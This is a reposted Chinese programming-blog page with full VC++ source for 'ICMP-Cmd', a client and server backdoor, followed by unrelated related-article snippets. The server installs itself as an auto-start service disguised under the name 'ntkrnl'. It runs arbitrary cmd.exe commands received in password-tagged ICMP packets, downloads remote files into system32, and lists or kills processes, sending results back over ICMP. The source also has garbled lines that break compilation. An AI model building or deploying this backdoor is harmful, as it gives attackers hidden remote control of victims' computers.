当前位置: 首页 > 编程日记 > 正文

vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序

编程日记 2024-09-08 08:50:00

客户端

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib,"ws2_32.lib")

char SendMsg[256];

/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IpHeader;


typedef struct _ihdr
{
BYTE i_type;//8位类型
BYTE i_code; //8位代码
USHORT i_cksum;//16位校验和
USHORT i_id;//识别号(一般用进程号作为识别号)
USHORT i_seq;//报文序列号
ULONG timestamp;//时间截
} IcmpHeader;

#define STATUS_FAILED 0xFFFF
 
#define MAX_PACKET 2000
char arg[1450];

#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))


void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);

void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);

int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; //目标主机的IP
char *recvbuf;

if(argc!=2)
 {
  usage(argv[0]);
  return 0;
 }

ICMP_DEST_IP=argv[1];//取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);

char *icmp_data;


if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d/n", GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;

usage(argv[0]);
__try{
for(;;){

printf("ICMP-CMD>");
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中

if(!strcmp(SendMsg,"Q/n")||!strcmp(SendMsg,"q/n"))ExitProcess(0);
if(!strcmp(SendMsg,"/n"))continue;
if(!strcmp(SendMsg,"H/n")||!strcmp(SendMsg,"h/n")){help();continue;}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("/nFileName Error. Use /"-FileName/"/n");continue;}

datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);

int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));

if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n");
fprintf(stderr,"sendto failed: %d/n",WSAGetLastError());

}

if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。

return 0;

}

printf("/nSend Packet to %s Success!/n",argv[1]);

DWORD start = GetTickCount();
for(;;){

if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out/n");
break;
}

fprintf(stderr, "recvfrom failed: %d/n", WSAGetLastError());
break;
}

decode_resp(recvbuf, bread, &from);
}
}//end for

}//end try


__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}

return 0;
}


USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while(size > 1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}

if(size)
{
cksum+=*(UCHAR *)buffer;
}

cksum=(cksum >> 16) + (cksum & 0xffff);
cksum+=(cksum >> 16);
return(USHORT) (~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr= (IcmpHeader *)icmp_data;
icmp_hdr->i_type=0;
icmp_hdr->i_code=0;
icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
icmp_hdr->timestamp =GetTickCount();
icmp_hdr->i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));

}

void usage(char * prog)
{
 printf("/t/t=====Welcome to www.hackerxfiles.net======/n");
 printf("/n");
    printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---/n");
 printf("/t/t---[ E-mail:    gxisone@hotmail.com   ]---/n");
 printf("/t/t---[                      2003/8/15   ]---/n");
 printf("/t/tusage: %s RemoteIP/n",prog);
 printf("/t/tCtrl+C or Q/q to Quite        H/h for help/n");
}


void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{
memset(arg,0,sizeof(arg));
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==4321)//密码正确则输出数据段
{
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
printf(" IcmpType %d",icmphdr->i_type);
printf(" IcmpCode %d",icmphdr->i_code);
printf("/n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
}

else printf("Other ICMP Packets!/n");

}

void help(void)
{
 printf("/n");
 printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is system32)/n");
 printf("[pslist]        (List the Process)/n");
 printf("[pskill ID]     (Kill the Process)/n");
 printf("Command         (run the command)/n");
 printf("/n");


}

服务端

#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h>
#include <tlhelp32.h>
#include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
                  
#define ICMP_PASSWORD 1234                                            
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))


/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IpHeader;


//定义ICMP首部
typedef struct _ihdr
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}IcmpHeader;

char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);

HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;

void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
void  WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void  InstallCmdService(void);
void  RemoveCmdService(void);
void  usage(char *par);

int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};

if(argc==2)
 {
  if(!stricmp(argv[1],"-install"))
  {
   usage(argv[0]);
   InstallCmdService();
  }
  else if(!stricmp(argv[1],"-remove"))
  {
   usage(argv[0]);
   RemoveCmdService();
  }
     else usage(argv[0]);
  return 0;
 }
else usage(argv[0]);

StartServiceCtrlDispatcher(DispatchTable);

return 0;
}

void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
 HANDLE    hThread;

ServiceStatus.dwServiceType             = SERVICE_WIN32;
 ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
 ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 ServiceStatus.dwServiceSpecificExitCode = 0;
 ServiceStatus.dwWin32ExitCode           = 0;
 ServiceStatus.dwCheckPoint              = 0;
 ServiceStatus.dwWaitHint                = 0;

ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
 if(ServiceStatusHandle==0)
 {
  OutputDebugString("RegisterServiceCtrlHandler Error !/n");
  return ;
 }

ServiceStatus.dwCurrentState = SERVICE_RUNNING;
 ServiceStatus.dwCheckPoint   = 0;
 ServiceStatus.dwWaitHint     = 0;
 
 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdStart Error !/n");
  return ;
 }

hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
 if(hThread==NULL)
 {
  OutputDebugString("CreateThread in CmdStart Error !/n");
 }

return ;
}

void WINAPI CmdControl(DWORD dwCode)
{
 switch(dwCode)
 {
 case SERVICE_CONTROL_PAUSE:
  ServiceStatus.dwCurrentState = SERVICE_PAUSED;
  break;

case SERVICE_CONTROL_CONTINUE:
  ServiceStatus.dwCurrentState = SERVICE_RUNNING;
  break;

case SERVICE_CONTROL_STOP:     
  WaitForSingleObject(hMutex,INFINITE);

ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
  ServiceStatus.dwWin32ExitCode = 0;
  ServiceStatus.dwCheckPoint    = 0;
  ServiceStatus.dwWaitHint      = 0;
  if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
  {
   OutputDebugString("SetServiceStatus in CmdControl in Switch Error !/n");
  }

ReleaseMutex(hMutex);
  CloseHandle(hMutex);
  return ;

case SERVICE_CONTROL_INTERROGATE:
  break;

default:
  break;
 }

if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdControl out Switch Error !/n");
 }

return ;
}

DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
{  
char *icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof(from);
int timeout = 2000;
char *recvbuf;

if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
  {
   printf("WSAStartup failed: %s/n",retval);
   ExitProcess(STATUS_FAILED);
  }

sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
  if (sockRaw == INVALID_SOCKET)
  {
   printf("WSASocket() failed: %s/n",WSAGetLastError());
   ExitProcess(STATUS_FAILED);
  }
__try{
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));

if(bread == SOCKET_ERROR) __leave;


memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
datasize=0;
datasize += sizeof(IcmpHeader);
icmp_data =(char*)xmalloc(MAX_PACKET);
recvbuf = (char*)xmalloc(MAX_PACKET);
if (!icmp_data) {
//fprintf(stderr,"HeapAlloc failed %d/n",GetLastError());
__leave;
}
memset(icmp_data,0,MAX_PACKET);
for(;;) {

int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));

bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)continue;

__leave;

}
decode_resp(recvbuf,bread,&from);
Sleep(200);
memset(recvbuf,0,sizeof(recvbuf));
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
 return 0;
}


void InstallCmdService(void)
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpCurrentPath[MAX_PATH];
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
    WIN32_FIND_DATA  FileData;
 HANDLE           hSearch;
 DWORD            dwErrorCode;
 SERVICE_STATUS   InstallServiceStatus;


  GetSystemDirectory(lpImagePath,MAX_PATH);
  strcat(lpImagePath,"//ntkrnl.exe");
        lpHostName=NULL;
 
 printf("Transmitting File ... ");
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
  if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
  {
   dwErrorCode=GetLastError();
   if(dwErrorCode==5)
   {
    printf("Failure ... Access is Denied !/n");        
   }
   else
   {
    printf("Failure !/n");
   }
       return ;
  }
     else
  {
      printf("Success !/n");
  }
 }
 else
 {
  printf("already Exists !/n");
  FindClose(hSearch);
 }

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
 {
  printf("Open Service Control Manager Database Failure !/n");
  return ;
 }

printf("Creating Service .... ");
 schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
                       SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
        SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
 if(schService==NULL)
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode!=ERROR_SERVICE_EXISTS)
  {
        printf("Failure !/n");
   CloseServiceHandle(schSCManager);
         return ;
  }
  else
  {
   printf("already Exists !/n");
   schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
   if(schService==NULL)
   {
    printf("Opening Service .... Failure !/n");
    CloseServiceHandle(schSCManager);
    return ;
   }
  }
 }
 else
 {
  printf("Success !/n");
 }

printf("Starting Service .... ");
 if(StartService(schService,0,NULL)==0)                        
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
  {
   printf("already Running !/n");
         CloseServiceHandle(schSCManager); 
          CloseServiceHandle(schService);
          return ;
  }
 }
 else
 {
  printf("Pending ... ");
 }

while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)          
 {
  if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
  {
   Sleep(100);
  }
  else
  {
   break;
  }
 }
 if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
 {
  printf("Failure !/n");                      
 }
 else
 {
  printf("Success !/n");
 }

CloseServiceHandle(schSCManager);
 CloseServiceHandle(schService);
 return ;
}

void RemoveCmdService(void)
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
    WIN32_FIND_DATA  FileData;
 SERVICE_STATUS   RemoveServiceStatus;
 HANDLE           hSearch;
 DWORD            dwErrorCode;


  GetSystemDirectory(lpImagePath,MAX_PATH);
  strcat(lpImagePath,"//ntkrnl.exe");
        lpHostName=NULL;

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
 {
  printf("Opening SCM ......... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode!=5)
  {
   printf("Failure !/n");
  }
  else
  {
   printf("Failuer ... Access is Denied !/n");
  }
  return ;
 }

schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
 if(schService==NULL)
 {
     printf("Opening Service ..... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode==1060)
  {
   printf("no Exists !/n");
  }
  else
  {
   printf("Failure !/n");
  }
  CloseServiceHandle(schSCManager);
 }
 else
 {
  printf("Stopping Service .... ");
      if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
  {
         if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
   {
           printf("already Stopped !/n");
   }
       else
   {
    printf("Pending ... ");
        if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
    {
          while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)        
     {
         Sleep(10);
         QueryServiceStatus(schService,&RemoveServiceStatus);
     }
          if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
     {
           printf("Success !/n");
     }
          else
     {
         printf("Failure !/n");
     }
    }
    else
    {
     printf("Failure !/n");         
    }
   }
  }
     else
  {
      printf("Query Failure !/n");
  }

printf("Removing Service .... ");    
       if(DeleteService(schService)==0)
  {
        printf("Failure !/n");  
  }
      else
  {
        printf("Success !/n");
  }
 }

CloseServiceHandle(schSCManager);       
 CloseServiceHandle(schService);

printf("Removing File ....... ");
 Sleep(1500);
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  printf("no Exists !/n");
 }
 else
 {
  if(DeleteFile(lpImagePath)==0)
  {
   printf("Failure !/n");              
  }
  else
  {
   printf("Success !/n");
  }
  FindClose(hSearch);
 }

return ;
}

void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{


IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
{

ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址

memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
{
 killps(atoi(strstr(arg," ")));
 memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
 send();
}

else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"remove/n"))
{
 RemoveCmdService();
 memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
 send();
 return;
}
************    http下载   *************
else if (!memcmp(arg,"http://",7))  
{
 if(char *FileName=strstr(arg,"-"))
 {
 
  char url[200];//保存网址的数组
  memset(url,0,200);
  memcpy(url,arg,int(FileName-arg-1));
  char fname[MAX_PATH];
  GetSystemDirectory(fname,MAX_PATH);
  FileName++;
  strcat(fname,"//");
  strcat(fname,FileName);
  *strstr(fname,"/n")=NULL;
  HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
  memset(buffer,0,sizeof(buffer));
  if(hRet==S_OK) memcpy(buffer,"Download OK!/n",sizeof("Download OK/n"));
  else
   memcpy(buffer,"Download Failure!/n",sizeof("Download Failure!/n"));
  send();
  return;
 }
}
//*******************************************
else{

SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
  printf("Error On CreatePipe()");
     return;
  }


STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);

strcat(cmdline,"//cmd.exe /c");

strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
        printf("Error on CreateProcess()");
        return;
}
  CloseHandle(hWrite);
       
 
DWORD bytesRead;

for(;;){
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
Sleep(200);
}
//printf("%s",buffer);
/
 //发送输出数据

send();

}


}
//else printf("Other ICMP Packets!/n");
//printf(endl;
}


USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}


void fill_icmp_data(char * icmp_data)
{

IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr = (IcmpHeader*)icmp_data;
icmp_hdr->i_type = 0;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq =4321;
icmp_hdr->timestamp = GetTickCount(); //设置时间戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}

void  usage(char *par)
{

printf("/t/t=====Welcome to www.hackerxfiles.net======/n");
 printf("/n");
 printf("/t/t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---/n");
 printf("/t/t---[ E-mail: gxisone@hotmail.com      ]---/n");
 printf("/t/t---[                        2003/8/15 ]---/n");
 printf("/n");
 printf("/t/tUsage: %s -install (to install service)/n",par);
 printf("/t/t       %s -remove (to remove service)/n",par);
 printf("/n");

return ;


}

void send(void)
{

WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000;
char *icmp_data;

if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader);
icmp_data=(char*)xmalloc(MAX_PACKET);

if(!icmp_data) __leave;
memset(icmp_data,0,MAX_PACKET);

fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文

if (bwrote == SOCKET_ERROR)
{
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out/n");
//printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}

//printf("Send Packet to %s Success!/n"<<ICMP_DEST_IP<<endl;
}


__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer,0,sizeof(buffer));
Sleep(200);

}

void pslist(void)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
{
printf("/nCreateToolhelp32Snapshot() failed:%d",GetLastError());
return ;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("/nProcessName     ProcessID");
if (Process32First(hProcessSnap, &pe32))
{
 char a[5];

do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer,"/t/t");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"/n");
//printf("/n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, &pe32));

}
else
{
 printf("/nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
return;
}

BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;

if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("/nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u/n", GetLastError() );
return FALSE;
}
return TRUE;
}

BOOL killps(DWORD id)//杀进程函数
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{

if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("/nOpen Current Process Token failed:%d",GetLastError());
__leave;
}
//printf("/nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf("/nSetPrivilege ok!");

if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("/nOpen Process %d failed:%d",id,GetLastError());
__leave;
}
//printf("/nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
{
printf("/nTerminateProcess failed:%d",GetLastError());
__leave;
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}

转载于:https://www.cnblogs.com/yincheng01/archive/2009/03/29/2213346.html


https://www.dkcj.cn/info/17802.html

相关文章:

arm linux 启动之一:汇编启动到start_kernel

描述arm linux启动的概要过程&#xff0c;以S5PV210(Cortex A8)为例&#xff0c;本文描述第一个阶段。 一、arm linux的引导 uboot在引导arm linux&#xff08;uImage镜像&#xff09;到SDRAM之后&#xff0c;通过bootm命令对uImage镜像的64个字节头进行解释&#xff0c;获取li…

编程日记2024/09/08 08:40:00

Sql Server 因为触发器问题导致数据库更新报错“在触发器执行过程中引发了错误,批处理已中止”的问题处理...

在维护一个非常旧的项目时&#xff0c;由于该项目版本已经非常老了&#xff0c;而且在客户现场运行的非常稳定&#xff0c;更要命的是本人目前没有找到该项目的代码&#xff0c;为了处理一个新的需求而且还不能修改程序代码&#xff0c;于是决定从数据库入手&#xff0c;毕竟该…

编程日记2024/09/08 08:30:00

1070 Mooncake

1. 一道典型的贪心题&#xff0c;策略是尽可能地多出售单价高的月饼。 2. 开始有一个用例没有通过&#xff0c;看了参考书&#xff0c;说是质量虽然给的都是整数&#xff0c;但是为了计算不出错&#xff0c;需要声明为浮点型。改了以后果然就通过了&#xff0c;但是个中原理不…

编程日记2024/09/08 08:20:00

Java数组合并,完成排序,从时间复杂度,和空间复杂度考虑

2019独角兽企业重金招聘Python工程师标准>>> 提供方法&#xff0c;直接调用&#xff0c;支持任意个数组的合并成一个数组&#xff0c;并且完成排序&#xff0c;每个数组元素个数不定。需要提供两个方法&#xff0c;分别做到时间复杂度最低、空间复杂度最低。并说明两…

编程日记2024/09/08 08:10:00

WPF中Auto与*的差别

Auto 表示自己主动适应显示内容的宽度, 如自己主动适应文本的宽度,文本有多长,控件就显示多长. * 则表示按比例来分配宽度. <ColumnDefinition Width"3*" /> <ColumnDefinition Width"7*" /> 相同,行能够这样定义 <RowDefinition Height&qu…

编程日记2024/09/08 08:00:00

个人电脑优化方案

2009年4月13日 文件删除--系统默认磁盘清理--批处理清除无用文件--使用优化软件如优化大师 Codeecho off echo 正在清除系统垃圾文件&#xff0c;请稍等 del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\…

编程日记2024/09/08 07:50:00

1037 Magic Coupon

1. 贪心算法题&#xff0c;贪心策略&#xff1a;两组乘子相乘&#xff0c;每个数字至多用一次&#xff0c;希望得到最大的乘积。那么让A组绝对值最大的正数和B组最绝对值最大的正数相乘&#xff0c;次大的和次大的相乘……同样的让A组绝对值最大的负数和B组绝对值最大的负数相乘…

编程日记2024/09/08 07:40:00

综合布线系统入门及应用(二)

一、工程材料用量估计 1、信息模块及水晶头用量统计 信息插座与工位数量1:1&#xff0c;在增加5%的余量 跳线&#xff1a;一般需要2条&#xff0c;工位信息面板到设备&#xff0c;交换机到配线架&#xff0c;每根条线2个水晶头&#xff0c;预留10%-15%。 2、线槽用量统计 根据办…

编程日记2024/09/08 07:30:00

如何查看服务器有多少网站--免费工具

一台虚拟主机上到底有多少个网站或者说同一ip下有多少个域名和网站&#xff1f;这是站长们都很关心的&#xff0c;因为这样可以知道你的站到底和谁是邻居&#xff0c;有时候如果你和百度黑名单上的垃圾站在同一空间下&#xff0c;你也会受到牵连。 那么怎 ...中间左侧广告 一台…

编程日记2024/09/08 07:20:00

二分法在算法题中的4种常见应用(cont.)

